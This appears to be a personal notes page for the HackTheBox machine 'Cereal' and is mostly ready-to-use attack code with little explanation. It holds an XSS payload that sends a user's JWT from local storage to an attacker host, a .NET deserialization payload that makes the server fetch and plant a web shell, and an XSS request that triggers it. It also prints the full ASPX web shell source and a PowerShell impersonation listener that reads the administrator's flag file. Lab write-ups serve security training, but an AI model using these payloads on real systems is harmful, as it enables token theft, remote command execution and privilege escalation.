xct's notes
Search…
⌃K

Cereal

Notes for https://youtu.be/tjaW1KC7lBI

GitTools

Auth Fiddle

Steal JWT from Local Storage via XSS

{
"RequestID":1000,
"json":"{\"title\":\"[y](javascript: (function () {window.location.href=\\\"http://10.10.14.91:8000/x\\\"+localStorage.getItem('currentUser');})(););\",\"flavor\":\"x)\",\"color\":\"x\",\"description\":\"x\"}"
}

Deserialization Fiddle

Store Deserialization Payload

{
"RequestId":1001,
"JSON":"{\"$type\":\"Cereal.DownloadHelper, cereal, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\",\"URL\":\"http://10.10.14.91/cmd.aspx\",\"FilePath\":\"c:\\\\inetpub\\\\source\\\\uploads\\\\xct.aspx\"}"
}

Trigger Deserialization Payload via XSS

{
"json":"{\"title\":\"[xhr](javascript:(function () {var x1=new XMLHttpRequest();x1.open('GET','https://cereal.htb/requests/1001');x1.setRequestHeader('Authorization','Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEiLCJuYmYiOjE2MDYwNTcxMTksImV4cCI6MTkyMTU4OTkxOSwiaWF0IjoxNjA2MDU3MTE5fQ.o9NIIeA9lnbaIopr3y1BlVh46l10OdOIfBX7wyspoBY');x1.withCredentials=true;x1.send();var x2=new XMLHttpRequest();x2.open('GET','https://10.10.14.91:8000/proof');x2.setRequestHeader('Authorization','Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEiLCJuYmYiOjE2MDYwNTcxMTksImV4cCI6MTkyMTU4OTkxOSwiaWF0IjoxNjA2MDU3MTE5fQ.o9NIIeA9lnbaIopr3y1BlVh46l10OdOIfBX7wyspoBY');x2.withCredentials=true;x2.send();})();)\",\"flavor\":\"x)\",\"color\":\"x\",\"description\":\"x\"}"
}

ASPX Shell

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->

Impersonation PowerShell Webserver

[System.Reflection.Assembly]::LoadWithPartialName("System.Web")
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add("http://localhost:7000/")
$listener.AuthenticationSchemes = [System.Net.AuthenticationSchemes]::IntegratedWindowsAuthentication
$listener.Start()
do {
Write-Host "Listening..."
$context = $listener.GetContext()
$requestUrl = $context.Request.Url
$response = $context.Response
$context.User.Identity.Impersonate()
$Content = ""
try{
# run any command as admin here
type C:\users\administrator\desktop\root.txt
} catch [System.UnauthorizedAccessException] {
$response.StatusCode = 401
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
} catch [System.Management.Automation.ItemNotFoundException] {
$response.StatusCode = 404
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
} catch {
$_
$Content = "$($_.InvocationInfo.MyCommand.Name) : $($_.Exception.Message)"
$Content += "$($_.InvocationInfo.PositionMessage)"
$Content += " + $($_.CategoryInfo.GetMessage())"
$Content += " + $($_.FullyQualifiedErrorId)"
$Content = [System.Text.Encoding]::UTF8.GetBytes($Content)
$response.StatusCode = 500
}
$response.ContentLength64 = $Content.Length
$response.OutputStream.Write($Content, 0, $Content.Length)
$response.Close()
Start-Sleep -Seconds 1
} while ($listener.IsListening)
Last modified 1yr ago